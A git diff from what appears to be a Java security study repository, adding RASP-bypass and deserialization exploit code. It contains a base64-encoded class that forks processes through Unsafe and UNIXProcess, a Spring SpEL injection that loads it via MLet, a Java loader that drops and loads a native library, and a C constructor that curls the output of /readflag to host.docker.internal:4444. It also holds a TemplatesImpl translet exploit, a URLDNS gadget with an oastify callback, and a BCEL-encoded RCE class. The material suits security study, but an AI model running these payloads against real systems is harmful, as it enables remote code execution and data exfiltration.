+ <value>yv66vgAAADQAmwoAFwBaBwBbCABcCgAVAF0KAF4AXwoAXgBgCABhCgAVAGIKAAIAYwcAZAgAZQgAZggAZwcALQoACgBoCgBpAGoIAEMIAEQKABcAawgARQcAbAoAFQBtBwBuCgBvAHAHAHEKABkAcggAcwkAGQB0BwA/CQB1AHQKABUAdgoAbwBfCgAZAHcKACQAeAoAdQB5BwB6AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWkBAAFJAQADYXJnAQACW0IBAAR0aGlzAQAUTGNvbS9kcnVua2JhYnkvRXZpbDsBAA50aGVVbnNhZmVGaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAZ1bnNhZmUBABFMc3VuL21pc2MvVW5zYWZlOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAANjbWQBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAHY21kQXJncwEAA1tbQgEABHNpemUBAAhhcmdCbG9jawEABGVudmMBAAJbSQEAB3N0ZF9mZHMBABRsYXVuY2hNZWNoYW5pc21GaWVsZAEAD2hlbHBlcnBhdGhGaWVsZAEAD2xhdW5jaE1lY2hhbmlzbQEACmhlbHBlcnBhdGgBAAdvcmRpbmFsAQAKZm9ya01ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANU3RhY2tNYXBUYWJsZQcAegcAewcAWwcAbAcAbgcAOQcAOwEACkV4Y2VwdGlvbnMHAHwBAAl0b0NTdHJpbmcBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQABcwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABWJ5dGVzAQAGcmVzdWx0AQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwAJQAmAQAPc3VuL21pc2MvVW5zYWZlAQAJdGhlVW5zYWZlDAB9AH4HAHsMAH8AgAwAgQCCAQAVamF2YS5sYW5nLlVOSVhQcm9jZXNzDACDAIQMAIUAhgEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBABJ0b3VjaCAvdG1wL3N1Y2Nlc3MMAIcAiAcAiQwAigCLDACMAI0BAA9qYXZhL2xhbmcvQ2xhc3MMAI4AjwEAEGphdmEvbGFuZy9PYmplY3QHAJAMAJEAkgEAEWphdmEvbGFuZy9JbnRlZ2VyDACTAJQBABBSQVNQX2ZvcmtBbmRFeGVjDACVADUHAJYMAJcAjwwAmACZDABSAFMMAJgAmgEAEmNvbS9kcnVua2JhYnkvRXZpbAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBhbGxvY2F0ZUluc3RhbmNlAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldEJ5dGVzAQAEKClbQgEAEGphdmEvbGFuZy9TeXN0ZW0BAAlhcnJheWNvcHkBACooTGphdmEvbGFuZy9PYmplY3Q7SUxqYXZhL2xhbmcvT2JqZWN0O0lJKVYBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIaW50VmFsdWUBAAMoKUkBAARUWVBFAQARamF2YS9sYW5nL0Jvb2xlYW4BABFnZXREZWNsYXJlZE1ldGhvZAEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAWKFopTGphdmEvbGFuZy9Cb29sZWFuOwAhACQAFwAAAAAAAgABACUAJgACACcAAAN6AAgAEgAAAcQqtwABEgISA7YABEwrBLYABSsBtgAGwAACTRIHuAAITiwttgAJOgQGvQAKWQMSC1NZBBIMU1kFEg1TOgUZBb4EZL0ADjoGGQa+NgcDNggVCBkGvqIAIxkGFQgZBRUIBGAytgAPUxUHGQYVCDK+YDYHhAgBp//bFQe8CDoIAzYJGQY6ChkKvjYLAzYMFQwVC6IAJxkKFQwyOg0ZDQMZCBUJGQ2+uAAQFQkZDb4EYGA2CYQMAaf/2AS8CjoKBrwKWQMCT1kEAk9ZBQJPOgstEhG2AAQ6DC0SErYABDoNGQwEtgAFGQ0EtgAFGQwZBLYABjoOGQ0ZBLYABsAADsAADjoPGQ62ABMSFAO9ABW2ABYZDgO9ABe2ABjAABm2ABo2EC0SGxAKvQAVWQOyABxTWQQSDlNZBRIOU1kGEg5TWQeyABxTWQgSDlNZEAayABxTWRAHEg5TWRAIEh1TWRAJsgAeU7YAHzoRGREEtgAgGREZBBAKvQAXWQMVEARguAAhU1kEGQ9TWQUqGQUDMrYAIlNZBhkIU1kHGQa+uAAhU1kIAVNZEAYZCgMuuAAhU1kQBwFTWRAIGQtTWRAJA7gAI1O2ABhXsQAAAAMAKAAAAIIAIAAAAAkABAAKAAwACwARAAwAGgAOACAADwAnABEAPAATAEYAFABLABYAVgAXAGUAGABwABYAdgAbAHwAHAB/AB4AmQAfAKYAIACwAB4AtgAjALsAJADMACYA1AAnANwAKQDiACoA6AAsAPEALQEAAC8BHwAxAWYAMgFsADMBwwA0ACkAAADKABQATgAoACoAKwAIAJkAFwAsAC0ADQAAAcQALgAvAAAADAG4ADAAMQABABoBqgAyADMAAgAgAaQANAA1AAMAJwGdADYANwAEADwBiAA4ADkABQBGAX4AOgA7AAYASwF5ADwAKwAHAHwBSAA9AC0ACAB/AUUAKgArAAkAuwEJAD4APwAKAMwA+ABAAD8ACwDUAPAAQQAxAAwA3ADoAEIAMQANAPEA0wBDADcADgEAAMQARAAtAA8BHwClAEUAKwAQAWYAXgBGAEcAEQBIAAAATAAE/wBOAAkHAEkHAEoHAEsHAEwHAE0HAE4HAE8BAQAA+gAn/wAUAA0HAEkHAEoHAEsHAEwHAE0HAE4HAE8BBwAOAQcATwEBAAD4ACoAUAAAAAQAAQBRAAEAUgBTAAEAJwAAAI0ABQAEAAAAJCvHAAUBsCu2AA9NLL4EYLwITiwDLQMsvrgAEC0tvgRkA1QtsAAAAAMAKAAAAB4ABwAAADcABAA4AAYAOgALADsAEgA8ABsAPQAiAD4AKQAAACoABAAAACQALgAvAAAAAAAkAFQAVQABAAsAGQBWAC0AAgASABIAVwAtAAMASAAAAAMAAQYAAQBYAAAAAgBZ</value>
+ </constructor-arg>
+ </bean>
+ <bean com.drunkbaby.Evil',T(org.springframework.util.Base64Utils).decodeFromString(data),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance()}"></bean>
+</beans>
\ No newline at end of file
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/example/Evil.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/example/Evil.java"
new file mode 100644
index 00000000..794ef563
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/com/example/Evil.java"
@@ -0,0 +1,14 @@
+package com.example;
+
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Base64;
+
+public class Evil {
+ public Evil() throws Exception {
+ String data = "PAYLOAD";
+ String filename = "/tmp/evil.so";
+ Files.write(Paths.get(filename), Base64.getDecoder().decode(data));
+ System.load(filename);
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/evilso/exp.c" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/evilso/exp.c"
new file mode 100644
index 00000000..5188fe0b
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/java/evilso/exp.c"
@@ -0,0 +1,7 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+__attribute__ ((__constructor__)) void preload (void){
+ system("curl host.docker.internal:4444 -d \"`/readflag`\"");
+}
\ No newline at end of file
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..5d92c34d
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>bypass</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..53e80bdb
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$bypass</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/bypass/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/pom.xml"
new file mode 100644
index 00000000..35e7a9b5
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/pom.xml"
@@ -0,0 +1,22 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>java_rasp</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <packaging>pom</packaging>
+ <name>Archetype - java_rasp</name>
+ <url>http://maven.apache.org</url>
+ <modules>
+ <module>agent</module>
+ <module>RCE-Test</module>
+ <module>bypass</module>
+ </modules>
+ <dependencies>
+ <dependency>
+ <groupid>org.javassist</groupid>
+ <artifactid>javassist</artifactid>
+ <version>3.27.0-GA</version>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..f4586db1
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>java_rasp</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..e2e9e655
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$java_rasp</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/344円272円247円345円223円201円345円274円200円345円217円221円/Java_Rasp/java_rasp/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Reappearance.iml" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Reappearance.iml"
new file mode 100644
index 00000000..64ec94ed
--- /dev/null
+++ "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Reappearance.iml"
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4">
+ <component name="NewModuleRootManager" inherit-compiler-output="true">
+ <exclude-output />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/Serialable" isTestSource="false" />
+ </content>
+ <orderentry type="inheritedJdk" />
+ <orderentry type="sourceFolder" forTests="false" />
+ </component>
+</module>
\ No newline at end of file
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/Serialable.iml" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/Serialable.iml"
new file mode 100644
index 00000000..b107a2dd
--- /dev/null
+++ "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/Serialable.iml"
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4">
+ <component name="NewModuleRootManager" inherit-compiler-output="true">
+ <exclude-output />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$" isTestSource="false" />
+ </content>
+ <orderentry type="inheritedJdk" />
+ <orderentry type="sourceFolder" forTests="false" />
+ </component>
+</module>
\ No newline at end of file
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.java" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.java"
index a040f8ea..97dc7033 100644
--- "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.java"
+++ "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.java"
@@ -1,11 +1,11 @@
-package src.DynamicClassLoader.BCELClassLoader;
-
-import com.sun.org.apache.bcel.internal.util.ClassLoader;
-
-// 修改过滤乱码
-public class BCELSuccessRce {
- public static void main(String[] args) throws Exception{
-
- new ClassLoader().loadClass("$$BCEL$$" + "$l8ドルb$I$A$A$A$A$A$A$A8ドルdQMO$db40ドル$Q7ドルd9ドルb8$b1c$i$C81ドル$f0$d1$PhK81ドル$QU$f5$a57$Q97ドル$ARU$D$V$Bz$de$y$ab$b0$d4$b1$p7ドルb83ドル$e0$X$f5$cc85ドル$o$O$fd$B$fc$u$c4$ecBi$a4$f6PK9ドルe$f17ドルb3$f3$e6$ad$f7$ee$fe$f6$X80ドルOX$f1$e1a$d6$c7$i$e63ドルd$bc0$f9$a58ドルbW3ドルeJx$edb$c1$c5$oCyC$rJo2$U9ドルbk$c7$MN3ドルb3ドルd91ドル$M$b5H$rro$d8$ef$ca$ec90ドルwcb$eaQ$wx7ドルc$cc3e$f0$T$e9$e8S953ドル7ドルc88ドル$f2L84ドル5ドルb97ドル$J$ef$x$d18ドルey9ドルeG$v3ドルf91ドルYxt$Q8ドルd$c268ドルf$c53ドルa83ドル$b7$n$e2$a7$a58ドルcD$g$d1$Z3ドルf$e7$a1J$c3$cf$fb$db$XB$O$b4J$Tj$abv4$X$dfw$f9$c0$$$p$df$M7ドルe$t$jfB$ee$u$b3$bcb$e43ドルe9ドルa$d9$A$V$f8$$$de$Ex8ドルbw$e48ドルa8ドルc8ドルa$AKx$cf0$f5$P$ed$A$cb$f0$ZZ$ffo9ドルaa$c2$ea$c43ドルc$e985ドル$fb$dd3$v4$c3$e4$l$ea60ドル98ドルh$d5$tO7ドルeO$eag$d0h$aeE7ドルf$f5$d0$c1$iy$nIr$b59R$ed$e8L$r$bd$f5$d181ドル$afY$wd9ドルe$d340ドルm40ドルEm7ドルf$c7a$c685ドル$a4c$bat$b1$e6$v80ドル99ドル$c3S$i$p$URf94ドルK$ad9ドルf60ドルW$b6$iP$y5ドルb$b28ドルc$w$c5$e0$b1$B$e3$a8Q$f60$f13ドルc$cc$ad$YP$bfA$a15ドルe$bc86ドル$f3$ed$H$bc$_$adk94ドル$af$y_$a1$d9$S8ドルaVq86ドル$be$Mc$b880ドル$U$aa$a40I$f1$f786ドル$w$i$c2uBS$f4$ba$uD$$$a6$j$w4$ac$a999ドル$H$X$f0$df84ドル$a2$C$A$A").newInstance();
- }
-}
+//package src.DynamicClassLoader.BCELClassLoader;
+//
+//
+//
+//// 修改过滤乱码
+//public class BCELSuccessRce {
+// public static void main(String[] args) throws Exception{
+//
+// new ClassLoader().loadClass("$$BCEL$$" + "$l8ドルb$I$A$A$A$A$A$A$A8ドルdQMO$db40ドル$Q7ドルd9ドルb8$b1c$i$C81ドル$f0$d1$PhK81ドル$QU$f5$a57$Q97ドル$ARU$D$V$Bz$de$y$ab$b0$d4$b1$p7ドルb83ドル$e0$X$f5$cc85ドル$o$O$fd$B$fc$u$c4$ecBi$a4$f6PK9ドルe$f17ドルb3$f3$e6$ad$f7$ee$fe$f6$X80ドルOX$f1$e1a$d6$c7$i$e63ドルd$bc0$f9$a58ドルbW3ドルeJx$edb$c1$c5$oCyC$rJo2$U9ドルbk$c7$MN3ドルb3ドルd91ドル$M$b5H$rro$d8$ef$ca$ec90ドルwcb$eaQ$wx7ドルc$cc3e$f0$T$e9$e8S953ドル7ドルc88ドル$f2L84ドル5ドルb97ドル$J$ef$x$d18ドルey9ドルeG$v3ドルf91ドルYxt$Q8ドルd$c268ドルf$c53ドルa83ドル$b7$n$e2$a7$a58ドルcD$g$d1$Z3ドルf$e7$a1J$c3$cf$fb$db$XB$O$b4J$Tj$abv4$X$dfw$f9$c0$$$p$df$M7ドルe$t$jfB$ee$u$b3$bcb$e43ドルe9ドルa$d9$A$V$f8$$$de$Ex8ドルbw$e48ドルa8ドルc8ドルa$AKx$cf0$f5$P$ed$A$cb$f0$ZZ$ffo9ドルaa$c2$ea$c43ドルc$e985ドル$fb$dd3$v4$c3$e4$l$ea60ドル98ドルh$d5$tO7ドルeO$eag$d0h$aeE7ドルf$f5$d0$c1$iy$nIr$b59R$ed$e8L$r$bd$f5$d181ドル$afY$wd9ドルe$d340ドルm40ドルEm7ドルf$c7a$c685ドル$a4c$bat$b1$e6$v80ドル99ドル$c3S$i$p$URf94ドルK$ad9ドルf60ドルW$b6$iP$y5ドルb$b28ドルc$w$c5$e0$b1$B$e3$a8Q$f60$f13ドルc$cc$ad$YP$bfA$a15ドルe$bc86ドル$f3$ed$H$bc$_$adk94ドル$af$y_$a1$d9$S8ドルaVq86ドル$be$Mc$b880ドル$U$aa$a40I$f1$f786ドル$w$i$c2uBS$f4$ba$uD$$$a6$j$w4$ac$a999ドル$H$X$f0$df84ドル$a2$C$A$A").newInstance();
+// }
+//}
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/URLClassLoader/Exploit.java" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/URLClassLoader/Exploit.java"
new file mode 100644
index 00000000..b987db64
--- /dev/null
+++ "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/URLClassLoader/Exploit.java"
@@ -0,0 +1,30 @@
+package src.DynamicClassLoader.URLClassLoader;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+import java.io.IOException;
+
+// 弹计算器的万能类
+public class Exploit extends AbstractTranslet {
+ static {
+ try {
+ Runtime.getRuntime().exec("touch /tmp/success");
+ } catch (IOException e){
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/ReflectDemo/SeralizeDemo/URLDNSEXP.java" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/ReflectDemo/SeralizeDemo/URLDNSEXP.java"
index 4e29271f..32aa973a 100644
--- "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/ReflectDemo/SeralizeDemo/URLDNSEXP.java"
+++ "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/ReflectDemo/SeralizeDemo/URLDNSEXP.java"
@@ -9,7 +9,7 @@ public class URLDNSEXP {
 public static void main(String[] args) throws Exception{
 HashMap<url,integer> hashmap= new HashMap<url,integer>();
 // 这里不要发起请求
- URL url = new URL("http://8oxpkyud88s5adzxg6lq7uj3gumka9.oastify.com");
+ URL url = new URL("http://2lovopw6370ldlc2nr68vnr8kzqqef.oastify.com");
 // Class c = url.getClass();
 Field hashcodeFile = Class.forName("java.net.URL").getDeclaredField("hashCode");
 hashcodeFile.setAccessible(true);
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.class"
deleted file mode 100644
index a1088902..00000000
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/BCELClassLoader/BCELSuccessRce.class" and /dev/null differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/Calc.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/Exploit.class"
similarity index 60%
rename from "JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/Calc.class"
rename to "JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/Exploit.class"
index e4f67258..c5e7562e 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/Calc.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/Exploit.class" differ
